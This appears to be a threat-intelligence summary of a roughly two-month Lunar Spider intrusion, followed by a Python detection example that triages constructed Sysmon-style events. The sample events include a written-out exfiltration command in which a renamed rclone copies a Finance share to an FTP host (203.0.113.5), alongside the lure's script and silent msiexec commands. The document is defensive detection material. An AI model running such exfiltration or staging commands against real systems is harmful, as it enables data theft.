From a single click: how Lunar Spider enabled a near two-month intrusion

Intel Name: From a single click: how Lunar Spider enabled a near two-month intrusion

Date of Scan: September 30, 2025

Impact: High

Summary:
The intrusion began with a JavaScript file linked to the Lunar Spider group and disguised as a tax form; it downloaded and executed Brute Ratel via an MSI installer. Over the course of the attack the threat actor deployed several tools: Latrodectus, Brute Ratel C4, Cobalt Strike, BackConnect, and a custom .NET backdoor. Credentials were harvested from multiple sources, including LSASS, backup software, browsers, and a Windows answer file used for unattended system setup. Data exfiltration began roughly 20 days into the intrusion, using Rclone and FTP. The actor remained active for nearly two months, maintaining intermittent C2 connections while continuing discovery, lateral movement, and further data theft.
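The chain above (script host running a .js lure from a download folder, msiexec spawned by that script, and a bulk-copy tool pushing data to FTP weeks later) is visible in ordinary process-creation telemetry. The following is an added example, not part of the report, showing three detection rules run over constructed Sysmon/4688-style events. The paths, timestamps, host 203.0.113.5 and the renamed binary svc.exe are all invented for illustration; the rclone on-the-fly remote syntax (":ftp,host=...:") and flags such as --transfers are real rclone features and are what lets the last rule catch a renamed copy of the tool.

```python
"""Toy triage over constructed process-creation events.

Added example illustrating detection for the TTPs in the summary; the events,
paths and timestamps below are constructed, not taken from the report.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon EID 1 / Windows 4688 style)."""
    ts: str
    image: str      # full path of the created process
    parent: str     # full path of the parent process
    cmdline: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|desktop|appdata)\\", re.I)
# rclone-specific syntax that survives renaming the binary: on-the-fly remotes
# (":ftp,host=...:", ":sftp:") and flags rarely seen outside rclone.
RCLONE_MARKERS = re.compile(
    r":(ftp|sftp|s3|webdav)[,:]|--transfers\s+\d+|--ignore-existing|--no-check-certificate",
    re.I,
)


def rule_script_host_user_dir(ev: ProcEvent) -> Optional[str]:
    """Initial access: wscript/cscript running a .js/.jse from a user-writable path."""
    if (basename(ev.image) in SCRIPT_HOSTS
            and re.search(r"\.jse?\b", ev.cmdline, re.I)
            and USER_WRITABLE.search(ev.cmdline)):
        return "script host executing .js from a user-writable directory"
    return None


def rule_msiexec_from_script_or_url(ev: ProcEvent) -> Optional[str]:
    """Payload staging: msiexec launched by a script/shell, or installing from a URL."""
    if basename(ev.image) != "msiexec.exe":
        return None
    if basename(ev.parent) in SCRIPT_HOSTS | SHELLS:
        return "msiexec spawned by a script host or shell"
    if re.search(r"https?://", ev.cmdline, re.I):
        return "msiexec installing a package from a URL"
    return None


def rule_rclone(ev: ProcEvent) -> Optional[str]:
    """Exfiltration: rclone by name, or by its distinctive syntax when renamed."""
    if basename(ev.image) == "rclone.exe" or RCLONE_MARKERS.search(ev.cmdline):
        return "rclone-style bulk transfer (possible exfiltration)"
    return None


RULES: List[Callable[[ProcEvent], Optional[str]]] = [
    rule_script_host_user_dir,
    rule_msiexec_from_script_or_url,
    rule_rclone,
]


def triage(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (timestamp, image basename, verdict) for every rule that fires."""
    hits = []
    for ev in events:
        for rule in RULES:
            verdict = rule(ev)
            if verdict:
                hits.append((ev.ts, basename(ev.image), verdict))
    return hits


# Constructed sample telemetry: two true positives from the lure stage, a benign
# MSI install, a renamed rclone pushing a share to FTP, and a normal svchost.
SAMPLE_EVENTS = [
    ProcEvent("T+0d 09:02:11", r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\jdoe\Downloads\Tax_Form.js"'),
    ProcEvent("T+0d 09:02:19", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\wscript.exe",
              r"msiexec.exe /i C:\Users\jdoe\AppData\Local\Temp\update.msi /qn"),
    ProcEvent("T+0d 09:10:00", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
              r"msiexec.exe /i C:\Temp\vendor_agent.msi"),
    ProcEvent("T+20d 02:14:05", r"C:\ProgramData\svc.exe", r"C:\Windows\System32\cmd.exe",
              r"svc.exe copy D:\Shares\Finance :ftp,host=203.0.113.5,user=up,pass=x:/in --transfers 32"),
    ProcEvent("T+20d 02:30:00", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
              r"svchost.exe -k netsvcs -p"),
]

if __name__ == "__main__":
    for ts, image, why in triage(SAMPLE_EVENTS):
        print(f"{ts}  {image:<14} {why}")
```

The rclone rule deliberately does not depend on the binary name: the summary notes exfiltration started about 20 days in, and by then the actor controls what the tool is called, so the command-line grammar is the more durable signal. The benign msiexec run from Explorer is included to show that the parent-process condition, not msiexec itself, is what carries the signal.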
